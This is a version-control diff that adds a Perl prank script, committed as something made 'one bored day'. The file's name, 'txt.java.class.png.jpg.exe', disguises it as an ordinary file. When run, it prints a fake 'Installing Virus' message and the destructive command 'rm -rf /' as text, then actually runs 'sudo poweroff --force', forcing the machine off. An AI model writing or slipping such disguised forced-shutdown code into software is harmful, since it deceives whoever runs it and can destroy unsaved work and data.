diff txt.java.class.png.jpg.exe @ 0:fd13a79adf94

added a program that chris calabrese and I worked on one bored day in front of winston's office
author Robert McIntyre <rlm@mit.edu>
date Tue, 18 Oct 2011 00:14:38 -0700
parents
children
line wrap: on
line diff
     1.1 --- /dev/null	Thu Jan 01 00:00:00 1970 +0000
     1.2 +++ b/txt.java.class.png.jpg.exe	Tue Oct 18 00:14:38 2011 -0700
     1.3 @@ -0,0 +1,25 @@
     1.4 +#!/usr/bin/perl
     1.5 +
     1.6 +$| = 1;
     1.7 +print "Installing Virus";
     1.8 +
     1.9 +dot();
    1.10 +dot();
    1.11 +dot();
    1.12 +print "\n";
    1.13 +
    1.14 +print "rm -rf /\n";
    1.15 +sleep 4;
    1.16 +`sudo poweroff --force`;
    1.17 +
    1.18 +
    1.19 +
    1.20 +
    1.21 +sub dot {
    1.22 +    sleep(1);
    1.23 +    print ".";
    1.24 +}
    1.25 +
    1.26 +
    1.27 +
    1.28 +"molgasoft"